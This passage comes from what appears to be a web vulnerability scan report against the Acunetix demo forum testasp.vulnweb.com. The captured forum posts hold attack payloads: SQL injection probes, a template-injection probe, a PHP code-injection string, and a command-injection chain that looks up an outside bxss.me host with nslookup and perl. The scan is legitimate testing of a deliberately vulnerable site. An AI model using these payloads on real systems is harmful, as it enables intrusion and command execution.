src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4136 |
Response Body - size: 4,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>/\xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 2+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 2+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 2+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4128 |
Response Body - size: 4,128 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>995022</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4180 |
Response Body - size: 4,180 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx{{98991*97996}}xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx{{98991*97996}}xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx{{98991*97996}}xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4147 |
Response Body - size: 4,147 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>";print(md5(31337));$a="</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4402 |
Response Body - size: 4,402 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")|(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")&(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 